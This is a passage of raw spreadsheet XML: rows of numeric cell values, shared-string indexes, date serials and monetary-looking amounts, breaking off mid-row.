    <row r="3121" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3121">
        <v>23099</v>
      </c>
      <c r="B3121">
        <v>5101</v>
      </c>
      <c r="C3121" t="s">
        <v>7948</v>
      </c>
      <c r="D3121" t="s">
        <v>12424</v>
      </c>
      <c r="E3121">
        <v>16</v>
      </c>
      <c r="F3121" t="s">
        <v>12425</v>
      </c>
      <c r="G3121" s="1">
        <v>44281</v>
      </c>
      <c r="H3121">
        <v>240</v>
      </c>
      <c r="I3121" t="s">
        <v>12426</v>
      </c>
    </row>
    <row r="3122" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3122">
        <v>23101</v>
      </c>
      <c r="B3122">
        <v>5078</v>
      </c>
      <c r="C3122" t="s">
        <v>7996</v>
      </c>
      <c r="D3122" t="s">
        <v>12427</v>
      </c>
      <c r="E3122">
        <v>16</v>
      </c>
      <c r="F3122" t="s">
        <v>10965</v>
      </c>
      <c r="G3122" s="1">
        <v>44263</v>
      </c>
      <c r="H3122">
        <v>1000</v>
      </c>
      <c r="I3122" t="s">
        <v>12428</v>
      </c>
    </row>
    <row r="3123" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3123">
        <v>23102</v>
      </c>
      <c r="B3123">
        <v>5078</v>
      </c>
      <c r="C3123" t="s">
        <v>7996</v>
      </c>
      <c r="D3123" t="s">
        <v>12427</v>
      </c>
      <c r="E3123">
        <v>16</v>
      </c>
      <c r="F3123" t="s">
        <v>12429</v>
      </c>
      <c r="G3123" s="1">
        <v>44263</v>
      </c>
      <c r="H3123">
        <v>1500</v>
      </c>
      <c r="I3123" t="s">
        <v>12430</v>
      </c>
    </row>
    <row r="3124" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3124">
        <v>23105</v>
      </c>
      <c r="B3124">
        <v>5105</v>
      </c>
      <c r="C3124" t="s">
        <v>8002</v>
      </c>
      <c r="D3124" t="s">
        <v>12431</v>
      </c>
      <c r="E3124">
        <v>16</v>
      </c>
      <c r="F3124" t="s">
        <v>8778</v>
      </c>
      <c r="G3124" s="1">
        <v>44238</v>
      </c>
      <c r="H3124">
        <v>1000</v>
      </c>
      <c r="I3124" t="s">
        <v>12432</v>
      </c>
    </row>
    <row r="3125" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3125">
        <v>23106</v>
      </c>
      <c r="B3125">
        <v>5105</v>
      </c>
      <c r="C3125" t="s">
        <v>8002</v>
      </c>
      <c r="D3125" t="s">
        <v>12431</v>
      </c>
      <c r="E3125">
        <v>16</v>
      </c>
      <c r="F3125" t="s">
        <v>12433</v>
      </c>
      <c r="G3125" s="1">
        <v>44238</v>
      </c>
      <c r="H3125">
        <v>3000</v>
      </c>
      <c r="I3125" t="s">
        <v>12434</v>
      </c>
    </row>
    <row r="3126" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3126">
        <v>23107</v>
      </c>
      <c r="B3126">
        <v>5108</v>
      </c>
      <c r="C3126" t="s">
        <v>8021</v>
      </c>
      <c r="D3126" t="s">
        <v>12435</v>
      </c>
      <c r="E3126">
        <v>12</v>
      </c>
      <c r="F3126" t="s">
        <v>9437</v>
      </c>
      <c r="G3126" s="1">
        <v>44258</v>
      </c>
      <c r="H3126">
        <v>100000</v>
      </c>
      <c r="I3126" t="s">
        <v>9550</v>
      </c>
      <c r="J3126" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="3127" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3127">
        <v>23108</v>
      </c>
      <c r="B3127">
        <v>5108</v>
      </c>
      <c r="C3127" t="s">
        <v>8021</v>
      </c>
      <c r="D3127" t="s">
        <v>12435</v>
      </c>
      <c r="E3127">
        <v>12</v>
      </c>
      <c r="F3127" t="s">
        <v>12436</v>
      </c>
      <c r="G3127" s="1">
        <v>44258</v>
      </c>
      <c r="H3127">
        <v>100000</v>
      </c>
      <c r="I3127" t="s">
        <v>9550</v>
      </c>
      <c r="J3127" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="3128" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3128">
        <v>23109</v>
      </c>
      <c r="B3128">
        <v>5108</v>
      </c>
      <c r="C3128" t="s">
        <v>8021</v>
      </c>
      <c r="D3128" t="s">
        <v>12435</v>
      </c>
      <c r="E3128">
        <v>12</v>
      </c>
      <c r="F3128" t="s">
        <v>12437</v>
      </c>
      <c r="G3128" s="1">
        <v>44258</v>
      </c>
      <c r="H3128">
        <v>100000</v>
      </c>
      <c r="I3128" t="s">
        <v>9550</v>
      </c>
      <c r="J3128" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="3129" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3129">
        <v>23110</v>
      </c>
      <c r="B3129">
        <v>5108</v>
      </c>
      <c r="C3129" t="s">
        <v>8021</v>
      </c>
      <c r="D3129" t="s">
        <v>12435</v>
      </c>
      <c r="E3129">
        <v>12</v>
      </c>
      <c r="F3129" t="s">
        <v>8913</v>
      </c>
      <c r="G3129" s="1">
        <v>44258</v>
      </c>
      <c r="H3129">
        <v>100000</v>
      </c>
      <c r="I3129" t="s">
        <v>9550</v>
      </c>
    </row>
    <row r="3130" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3130">
        <v>23111</v>
      </c>
      <c r="B3130">
        <v>5088</v>
      </c>
      <c r="C3130" t="s">
        <v>7924</v>
      </c>
      <c r="D3130" t="s">
        <v>12438</v>
      </c>
      <c r="E3130">
        <v>5</v>
      </c>
      <c r="F3130" t="s">
        <v>12439</v>
      </c>
      <c r="G3130" s="1">
        <v>44155</v>
      </c>
      <c r="H3130">
        <v>10000</v>
      </c>
      <c r="I3130" t="s">
        <v>12440</v>
      </c>
      <c r="J3130" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="3131" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3131">
        <v>23112</v>
      </c>
      <c r="B3131">
        <v>5087</v>
      </c>
      <c r="C3131" t="s">
        <v>7929</v>
      </c>
      <c r="D3131" t="s">
        <v>12441</v>
      </c>
      <c r="E3131">
        <v>5</v>
      </c>
      <c r="F3131" t="s">
        <v>12439</v>
      </c>
      <c r="G3131" s="1">
        <v>44148</v>
      </c>
      <c r="H3131">
        <v>10000</v>
      </c>
      <c r="I3131" t="s">
        <v>12440</v>
      </c>
      <c r="J3131" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="3132" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3132">
        <v>23113</v>
      </c>
      <c r="B3132">
        <v>350</v>
      </c>
      <c r="C3132" t="s">
        <v>16477</v>
      </c>
      <c r="D3132" t="s">
        <v>16478</v>
      </c>
      <c r="E3132">
        <v>20</v>
      </c>
      <c r="F3132" t="s">
        <v>12442</v>
      </c>
      <c r="G3132" s="1">
        <v>44165</v>
      </c>
      <c r="H3132" s="4">
        <v>18211</v>
      </c>
      <c r="I3132" t="s">
        <v>12443</v>
      </c>
      <c r="J3132" t="s">
        <v>10662</v>
      </c>
    </row>
    <row r="3133" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3133">
        <v>23115</v>
      </c>
      <c r="B3133">
        <v>350</v>
      </c>
      <c r="C3133" t="s">
        <v>16477</v>
      </c>
      <c r="D3133" t="s">
        <v>16478</v>
      </c>
      <c r="E3133">
        <v>20</v>
      </c>
      <c r="F3133" t="s">
        <v>12444</v>
      </c>
      <c r="G3133" s="1">
        <v>44165</v>
      </c>
      <c r="H3133" s="4">
        <v>63500</v>
      </c>
      <c r="I3133" t="s">
        <v>12445</v>
      </c>
      <c r="J3133" t="s">
        <v>10662</v>
      </c>
    </row>
    <row r="3134" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3134">
        <v>23116</v>
      </c>
      <c r="B3134">
        <v>350</v>
      </c>
      <c r="C3134" t="s">
        <v>16477</v>
      </c>
      <c r="D3134" t="s">
        <v>16478</v>
      </c>
      <c r="E3134">
        <v>20</v>
      </c>
      <c r="F3134" t="s">
        <v>12446</v>
      </c>
      <c r="G3134" s="1">
        <v>44165</v>
      </c>
      <c r="H3134" s="4">
        <v>37400</v>
      </c>
      <c r="I3134" t="s">
        <v>12447</v>
      </c>
      <c r="J3134" t="s">
        <v>10662</v>
      </c>
    </row>
    <row r="3135" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3135">
        <v>23122</v>
      </c>
      <c r="B3135">
        <v>5079</v>
      </c>
      <c r="C3135" t="s">
        <v>8010</v>
      </c>
      <c r="D3135" t="s">
        <v>12427</v>
      </c>
      <c r="E3135">
        <v>16</v>
      </c>
      <c r="F3135" t="s">
        <v>12448</v>
      </c>
      <c r="G3135" s="1">
        <v>44263</v>
      </c>
      <c r="H3135">
        <v>2500</v>
      </c>
      <c r="I3135" t="s">
        <v>12449</v>
      </c>
    </row>
    <row r="3136" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3136">
        <v>23123</v>
      </c>
      <c r="B3136">
        <v>1308</v>
      </c>
      <c r="C3136" t="s">
        <v>3022</v>
      </c>
      <c r="D3136" t="s">
        <v>9503</v>
      </c>
      <c r="E3136">
        <v>11</v>
      </c>
      <c r="F3136" t="s">
        <v>12450</v>
      </c>
      <c r="G3136" s="1">
        <v>44211</v>
      </c>
      <c r="H3136">
        <v>800000</v>
      </c>
      <c r="J3136" t="s">
        <v>12451</v>
      </c>
    </row>
    <row r="3137" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3137">
        <v>23124</v>
      </c>
      <c r="B3137">
        <v>1308</v>
      </c>
      <c r="C3137" t="s">
        <v>3022</v>
      </c>
      <c r="D3137" t="s">
        <v>9503</v>
      </c>
      <c r="E3137">
        <v>11</v>
      </c>
      <c r="F3137" t="s">
        <v>9459</v>
      </c>
      <c r="G3137" s="1">
        <v>44211</v>
      </c>
      <c r="H3137">
        <v>800000</v>
      </c>
      <c r="J3137" t="s">
        <v>12452</v>
      </c>
    </row>
    <row r="3138" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3138">
        <v>23125</v>
      </c>
      <c r="B3138">
        <v>1308</v>
      </c>
      <c r="C3138" t="s">
        <v>3022</v>
      </c>
      <c r="D3138" t="s">
        <v>9503</v>
      </c>
      <c r="E3138">
        <v>11</v>
      </c>
      <c r="F3138" t="s">
        <v>9437</v>
      </c>
      <c r="G3138" s="1">
        <v>44211</v>
      </c>
      <c r="H3138">
        <v>800000</v>
      </c>
      <c r="J3138" t="s">
        <v>12453</v>
      </c>
    </row>
    <row r="3139" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3139">
        <v>23126</v>
      </c>
      <c r="B3139">
        <v>1308</v>
      </c>
      <c r="C3139" t="s">
        <v>3022</v>
      </c>
      <c r="D3139" t="s">
        <v>9503</v>
      </c>
      <c r="E3139">
        <v>11</v>
      </c>
      <c r="F3139" t="s">
        <v>9532</v>
      </c>
      <c r="G3139" s="1">
        <v>44211</v>
      </c>
      <c r="H3139">
        <v>400000</v>
      </c>
      <c r="J3139" t="s">
        <v>11047</v>
      </c>
    </row>
    <row r="3140" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3140">
        <v>23127</v>
      </c>
      <c r="B3140">
        <v>1308</v>
      </c>
      <c r="C3140" t="s">
        <v>3022</v>
      </c>
      <c r="D3140" t="s">
        <v>9503</v>
      </c>
      <c r="E3140">
        <v>11</v>
      </c>
      <c r="F3140" t="s">
        <v>4686</v>
      </c>
      <c r="G3140" s="1">
        <v>44211</v>
      </c>
      <c r="H3140">
        <v>400000</v>
      </c>
      <c r="J3140" t="s">
        <v>12454</v>
      </c>
    </row>
    <row r="3141" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3141">
        <v>23128</v>
      </c>
      <c r="B3141">
        <v>1308</v>
      </c>
      <c r="C3141" t="s">
        <v>3022</v>
      </c>
      <c r="D3141" t="s">
        <v>9503</v>
      </c>
      <c r="E3141">
        <v>11</v>
      </c>
      <c r="F3141" t="s">
        <v>2236</v>
      </c>
      <c r="G3141" s="1">
        <v>44211</v>
      </c>
      <c r="H3141">
        <v>400000</v>
      </c>
      <c r="J3141" t="s">
        <v>12455</v>
      </c>
    </row>
    <row r="3142" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3142">
        <v>23129</v>
      </c>
      <c r="B3142">
        <v>1308</v>
      </c>
      <c r="C3142" t="s">
        <v>3022</v>
      </c>
      <c r="D3142" t="s">
        <v>9503</v>
      </c>
      <c r="E3142">
        <v>11</v>
      </c>
      <c r="F3142" t="s">
        <v>9435</v>
      </c>
      <c r="G3142" s="1">
        <v>44211</v>
      </c>
      <c r="H3142">
        <v>300000</v>
      </c>
      <c r="J3142" t="s">
        <v>10751</v>
      </c>
    </row>
    <row r="3143" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3143">
        <v>23130</v>
      </c>
      <c r="B3143">
        <v>1308</v>
      </c>
      <c r="C3143" t="s">
        <v>3022</v>
      </c>
      <c r="D3143" t="s">
        <v>9503</v>
      </c>
      <c r="E3143">
        <v>11</v>
      </c>
      <c r="F3143" t="s">
        <v>1746</v>
      </c>
      <c r="G3143" s="1">
        <v>44211</v>
      </c>
      <c r="H3143">
        <v>400000</v>
      </c>
      <c r="J3143" t="s">
        <v>12456</v>
      </c>
    </row>
    <row r="3144" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3144">
        <v>23131</v>
      </c>
      <c r="B3144">
        <v>1308</v>
      </c>
      <c r="C3144" t="s">
        <v>3022</v>
      </c>
      <c r="D3144" t="s">
        <v>9503</v>
      </c>
      <c r="E3144">
        <v>11</v>
      </c>
      <c r="F3144" t="s">
        <v>9595</v>
      </c>
      <c r="G3144" s="1">
        <v>44211</v>
      </c>
      <c r="H3144">
        <v>250000</v>
      </c>
      <c r="J3144" t="s">
        <v>12457</v>
      </c>
    </row>
    <row r="3145" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3145">
        <v>23132</v>
      </c>
      <c r="B3145">
        <v>1308</v>
      </c>
      <c r="C3145" t="s">
        <v>3022</v>
      </c>
      <c r="D3145" t="s">
        <v>9503</v>
      </c>
      <c r="E3145">
        <v>11</v>
      </c>
      <c r="F3145" t="s">
        <v>9523</v>
      </c>
      <c r="G3145" s="1">
        <v>44211</v>
      </c>
      <c r="H3145">
        <v>150000</v>
      </c>
      <c r="J3145" t="s">
        <v>11047</v>
      </c>
    </row>
    <row r="3146" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3146">
        <v>23133</v>
      </c>
      <c r="B3146">
        <v>1308</v>
      </c>
      <c r="C3146" t="s">
        <v>3022</v>
      </c>
      <c r="D3146" t="s">
        <v>9503</v>
      </c>
      <c r="E3146">
        <v>11</v>
      </c>
      <c r="F3146" t="s">
        <v>9460</v>
      </c>
      <c r="G3146" s="1">
        <v>44211</v>
      </c>
      <c r="H3146">
        <v>150000</v>
      </c>
    </row>
    <row r="3147" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3147">
        <v>23134</v>
      </c>
      <c r="B3147">
        <v>88</v>
      </c>
      <c r="C3147" t="s">
        <v>73</v>
      </c>
      <c r="D3147" t="s">
        <v>9516</v>
      </c>
      <c r="E3147">
        <v>14</v>
      </c>
      <c r="F3147" t="s">
        <v>9681</v>
      </c>
      <c r="G3147" s="1">
        <v>44154</v>
      </c>
      <c r="H3147">
        <v>445000</v>
      </c>
      <c r="J3147" t="s">
        <v>12458</v>
      </c>
    </row>
    <row r="3148" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3148">
        <v>23135</v>
      </c>
      <c r="B3148">
        <v>88</v>
      </c>
      <c r="C3148" t="s">
        <v>73</v>
      </c>
      <c r="D3148" t="s">
        <v>9516</v>
      </c>
      <c r="E3148">
        <v>14</v>
      </c>
      <c r="F3148" t="s">
        <v>9722</v>
      </c>
      <c r="G3148" s="1">
        <v>44154</v>
      </c>
      <c r="H3148">
        <v>445000</v>
      </c>
      <c r="J3148" t="s">
        <v>12458</v>
      </c>
    </row>
    <row r="3149" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3149">
        <v>23136</v>
      </c>
      <c r="B3149">
        <v>1363</v>
      </c>
      <c r="C3149" t="s">
        <v>16479</v>
      </c>
      <c r="D3149" t="s">
        <v>16480</v>
      </c>
      <c r="E3149">
        <v>14</v>
      </c>
      <c r="F3149" t="s">
        <v>2407</v>
      </c>
      <c r="G3149" s="1">
        <v>44210</v>
      </c>
      <c r="H3149">
        <v>195270.85</v>
      </c>
      <c r="J3149" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="3150" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3150">
        <v>23138</v>
      </c>
      <c r="B3150">
        <v>174</v>
      </c>
      <c r="C3150" t="s">
        <v>1828</v>
      </c>
      <c r="D3150" t="s">
        <v>11710</v>
      </c>
      <c r="E3150">
        <v>13</v>
      </c>
      <c r="F3150" t="s">
        <v>2236</v>
      </c>
      <c r="G3150" s="1">
        <v>44162</v>
      </c>
      <c r="H3150">
        <v>0</v>
      </c>
      <c r="J3150" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="3151" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3151">
        <v>23139</v>
      </c>
      <c r="B3151">
        <v>174</v>
      </c>
      <c r="C3151" t="s">
        <v>1828</v>
      </c>
      <c r="D3151" t="s">
        <v>11710</v>
      </c>
      <c r="E3151">
        <v>13</v>
      </c>
      <c r="F3151" t="s">
        <v>9900</v>
      </c>
      <c r="G3151" s="1">
        <v>44162</v>
      </c>
      <c r="H3151">
        <v>0</v>
      </c>
      <c r="J3151" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="3152" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3152">
        <v>23140</v>
      </c>
      <c r="B3152">
        <v>4965</v>
      </c>
      <c r="C3152" t="s">
        <v>7988</v>
      </c>
      <c r="D3152" t="s">
        <v>12459</v>
      </c>
      <c r="E3152">
        <v>12</v>
      </c>
      <c r="F3152" t="s">
        <v>12460</v>
      </c>
      <c r="G3152" s="1">
        <v>44168</v>
      </c>
      <c r="H3152">
        <v>100000</v>
      </c>
      <c r="I3152" t="s">
        <v>9550</v>
      </c>
      <c r="J3152" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="3153" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3153">
        <v>23141</v>
      </c>
      <c r="B3153">
        <v>4965</v>
      </c>
      <c r="C3153" t="s">
        <v>7988</v>
      </c>
      <c r="D3153" t="s">
        <v>12459</v>
      </c>
      <c r="E3153">
        <v>12</v>
      </c>
      <c r="F3153" t="s">
        <v>9732</v>
      </c>
      <c r="G3153" s="1">
        <v>44168</v>
      </c>
      <c r="H3153">
        <v>100000</v>
      </c>
      <c r="I3153" t="s">
        <v>9550</v>
      </c>
      <c r="J3153" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="3154" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3154">
        <v>23142</v>
      </c>
      <c r="B3154">
        <v>4965</v>
      </c>
      <c r="C3154" t="s">
        <v>7988</v>
      </c>
      <c r="D3154" t="s">
        <v>12459</v>
      </c>
      <c r="E3154">
        <v>12</v>
      </c>
      <c r="F3154" t="s">
        <v>10463</v>
      </c>
      <c r="G3154" s="1">
        <v>44168</v>
      </c>
      <c r="H3154">
        <v>50000</v>
      </c>
      <c r="I3154" t="s">
        <v>9550</v>
      </c>
      <c r="J3154" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="3155" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3155">
        <v>23143</v>
      </c>
      <c r="B3155">
        <v>4965</v>
      </c>
      <c r="C3155" t="s">
        <v>7988</v>
      </c>
      <c r="D3155" t="s">
        <v>12459</v>
      </c>
      <c r="E3155">
        <v>12</v>
      </c>
      <c r="F3155" t="s">
        <v>9941</v>
      </c>
      <c r="G3155" s="1">
        <v>44168</v>
      </c>
      <c r="H3155">
        <v>50000</v>
      </c>
      <c r="I3155" t="s">
        <v>9550</v>
      </c>
      <c r="J3155" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="3156" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3156">
        <v>23144</v>
      </c>
      <c r="B3156">
        <v>1224</v>
      </c>
      <c r="C3156" t="s">
        <v>3625</v>
      </c>
      <c r="D3156" t="s">
        <v>12461</v>
      </c>
      <c r="E3156">
        <v>16</v>
      </c>
      <c r="F3156" t="s">
        <v>11826</v>
      </c>
      <c r="G3156" s="1">
        <v>44194</v>
      </c>
      <c r="H3156">
        <v>100000</v>
      </c>
      <c r="I3156" t="s">
        <v>9693</v>
      </c>
      <c r="J3156" t="s">
        <v>10616</v>
      </c>
    </row>
    <row r="3157" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3157">
        <v>23145</v>
      </c>
      <c r="B3157">
        <v>1224</v>
      </c>
      <c r="C3157" t="s">
        <v>3625</v>
      </c>
      <c r="D3157" t="s">
        <v>12461</v>
      </c>
      <c r="E3157">
        <v>16</v>
      </c>
      <c r="F3157" t="s">
        <v>12462</v>
      </c>
      <c r="G3157" s="1">
        <v>44194</v>
      </c>
      <c r="H3157">
        <v>100000</v>
      </c>
      <c r="I3157" t="s">
        <v>9693</v>
      </c>
      <c r="J3157" t="s">
        <v>12463</v>
      </c>
    </row>
    <row r="3158" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3158">
        <v>23146</v>
      </c>
      <c r="B3158">
        <v>1224</v>
      </c>
      <c r="C3158" t="s">
        <v>3625</v>
      </c>
      <c r="D3158" t="s">
        <v>12461</v>
      </c>
      <c r="E3158">
        <v>16</v>
      </c>
      <c r="F3158" t="s">
        <v>9437</v>
      </c>
      <c r="G3158" s="1">
        <v>44194</v>
      </c>
      <c r="H3158">
        <v>100000</v>
      </c>
      <c r="I3158" t="s">
        <v>9693</v>
      </c>
      <c r="J3158" t="s">
        <v>10616</v>
      </c>
    </row>
    <row r="3159" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3159">
        <v>23147</v>
      </c>
      <c r="B3159">
        <v>1224</v>
      </c>
      <c r="C3159" t="s">
        <v>3625</v>
      </c>
      <c r="D3159" t="s">
        <v>12461</v>
      </c>
      <c r="E3159">
        <v>16</v>
      </c>
      <c r="F3159" t="s">
        <v>9435</v>
      </c>
      <c r="G3159" s="1">
        <v>44194</v>
      </c>
      <c r="H3159">
        <v>50000</v>
      </c>
      <c r="I3159" t="s">
        <v>9693</v>
      </c>
      <c r="J3159" t="s">
        <v>12463</v>
      </c>
    </row>
    <row r="3160" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3160">
        <v>23148</v>
      </c>
      <c r="B3160">
        <v>1224</v>
      </c>
      <c r="C3160" t="s">
        <v>3625</v>
      </c>
      <c r="D3160" t="s">
        <v>12461</v>
      </c>
      <c r="E3160">
        <v>16</v>
      </c>
      <c r="F3160" t="s">
        <v>9681</v>
      </c>
      <c r="G3160" s="1">
        <v>44194</v>
      </c>
      <c r="H3160">
        <v>50000</v>
      </c>
      <c r="I3160" t="s">
        <v>9693</v>
      </c>
      <c r="J3160" t="s">
        <v>9572</v>
      </c>
    </row>
    <row r="3161" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3161">
        <v>23149</v>
      </c>
      <c r="B3161">
        <v>1224</v>
      </c>
      <c r="C3161" t="s">
        <v>3625</v>
      </c>
      <c r="D3161" t="s">
        <v>12461</v>
      </c>
      <c r="E3161">
        <v>16</v>
      </c>
      <c r="F3161" t="s">
        <v>1746</v>
      </c>
      <c r="G3161" s="1">
        <v>44194</v>
      </c>
      <c r="H3161">
        <v>50000</v>
      </c>
      <c r="I3161" t="s">
        <v>9693</v>
      </c>
      <c r="J3161" t="s">
        <v>9934</v>
      </c>
    </row>
    <row r="3162" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3162">
        <v>23150</v>
      </c>
      <c r="B3162">
        <v>1224</v>
      </c>
      <c r="C3162" t="s">
        <v>3625</v>
      </c>
      <c r="D3162" t="s">
        <v>12461</v>
      </c>
      <c r="E3162">
        <v>16</v>
      </c>
      <c r="F3162" t="s">
        <v>2236</v>
      </c>
      <c r="G3162" s="1">
        <v>44194</v>
      </c>
      <c r="H3162">
        <v>50000</v>
      </c>
      <c r="I3162" t="s">
        <v>9693</v>
      </c>
      <c r="J3162" t="s">
        <v>9572</v>
      </c>
    </row>
    <row r="3163" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3163">
        <v>23151</v>
      </c>
      <c r="B3163">
        <v>1224</v>
      </c>
      <c r="C3163" t="s">
        <v>3625</v>
      </c>
      <c r="D3163" t="s">
        <v>12461</v>
      </c>
      <c r="E3163">
        <v>16</v>
      </c>
      <c r="F3163" t="s">
        <v>3763</v>
      </c>
      <c r="G3163" s="1">
        <v>44194</v>
      </c>
      <c r="H3163">
        <v>20000</v>
      </c>
      <c r="I3163" t="s">
        <v>9693</v>
      </c>
      <c r="J3163" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="3164" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3164">
        <v>23152</v>
      </c>
      <c r="B3164">
        <v>1224</v>
      </c>
      <c r="C3164" t="s">
        <v>3625</v>
      </c>
      <c r="D3164" t="s">
        <v>12461</v>
      </c>
      <c r="E3164">
        <v>16</v>
      </c>
      <c r="F3164" t="s">
        <v>7241</v>
      </c>
      <c r="G3164" s="1">
        <v>44194</v>
      </c>
      <c r="H3164">
        <v>20000</v>
      </c>
      <c r="I3164" t="s">
        <v>9693</v>
      </c>
      <c r="J3164" t="s">
        <v>10817</v>
      </c>
    </row>
    <row r="3165" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3165">
        <v>23153</v>
      </c>
      <c r="B3165">
        <v>1224</v>
      </c>
      <c r="C3165" t="s">
        <v>3625</v>
      </c>
      <c r="D3165" t="s">
        <v>12461</v>
      </c>
      <c r="E3165">
        <v>16</v>
      </c>
      <c r="F3165" t="s">
        <v>10543</v>
      </c>
      <c r="G3165" s="1">
        <v>44194</v>
      </c>
      <c r="H3165">
        <v>50000</v>
      </c>
      <c r="I3165" t="s">
        <v>9693</v>
      </c>
      <c r="J3165" t="s">
        <v>10817</v>
      </c>
    </row>
    <row r="3166" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3166">
        <v>23154</v>
      </c>
      <c r="B3166">
        <v>1224</v>
      </c>
      <c r="C3166" t="s">
        <v>3625</v>
      </c>
      <c r="D3166" t="s">
        <v>12461</v>
      </c>
      <c r="E3166">
        <v>16</v>
      </c>
      <c r="F3166" t="s">
        <v>6917</v>
      </c>
      <c r="G3166" s="1">
        <v>44194</v>
      </c>
      <c r="H3166">
        <v>10000</v>
      </c>
      <c r="I3166" t="s">
        <v>9693</v>
      </c>
      <c r="J3166" t="s">
        <v>12464</v>
      </c>
    </row>
    <row r="3167" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3167">
        <v>23155</v>
      </c>
      <c r="B3167">
        <v>1224</v>
      </c>
      <c r="C3167" t="s">
        <v>3625</v>
      </c>
      <c r="D3167" t="s">
        <v>12461</v>
      </c>
      <c r="E3167">
        <v>16</v>
      </c>
      <c r="F3167" t="s">
        <v>12465</v>
      </c>
      <c r="G3167" s="1">
        <v>44194</v>
      </c>
      <c r="H3167">
        <v>20000</v>
      </c>
      <c r="I3167" t="s">
        <v>9693</v>
      </c>
      <c r="J3167" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="3168" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3168">
        <v>23156</v>
      </c>
      <c r="B3168">
        <v>5010</v>
      </c>
      <c r="C3168" t="s">
        <v>7983</v>
      </c>
      <c r="D3168" t="s">
        <v>11717</v>
      </c>
      <c r="E3168">
        <v>11</v>
      </c>
      <c r="F3168" t="s">
        <v>9453</v>
      </c>
      <c r="G3168" s="1">
        <v>44160</v>
      </c>
      <c r="H3168">
        <v>100000</v>
      </c>
      <c r="J3168" t="s">
        <v>12466</v>
      </c>
    </row>
    <row r="3169" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3169">
        <v>23158</v>
      </c>
      <c r="B3169">
        <v>5010</v>
      </c>
      <c r="C3169" t="s">
        <v>7983</v>
      </c>
      <c r="D3169" t="s">
        <v>11717</v>
      </c>
      <c r="E3169">
        <v>11</v>
      </c>
      <c r="F3169" t="s">
        <v>547</v>
      </c>
      <c r="G3169" s="1">
        <v>44160</v>
      </c>
      <c r="H3169">
        <v>100000</v>
      </c>
      <c r="J3169" t="s">
        <v>11378</v>
      </c>
    </row>
    <row r="3170" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3170">
        <v>23159</v>
      </c>
      <c r="B3170">
        <v>5010</v>
      </c>
      <c r="C3170" t="s">
        <v>7983</v>
      </c>
      <c r="D3170" t="s">
        <v>11717</v>
      </c>
      <c r="E3170">
        <v>11</v>
      </c>
      <c r="F3170" t="s">
        <v>10667</v>
      </c>
      <c r="G3170" s="1">
        <v>44160</v>
      </c>
      <c r="H3170">
        <v>100000</v>
      </c>
      <c r="J3170" t="s">
        <v>12466</v>
      </c>
    </row>
    <row r="3171" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3171">
        <v>23160</v>
      </c>
      <c r="B3171">
        <v>5010</v>
      </c>
      <c r="C3171" t="s">
        <v>7983</v>
      </c>
      <c r="D3171" t="s">
        <v>11717</v>
      </c>
      <c r="E3171">
        <v>11</v>
      </c>
      <c r="F3171" t="s">
        <v>3204</v>
      </c>
      <c r="G3171" s="1">
        <v>44160</v>
      </c>
      <c r="H3171">
        <v>100000</v>
      </c>
      <c r="J3171" t="s">
        <v>12467</v>
      </c>
    </row>
    <row r="3172" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3172">
        <v>23161</v>
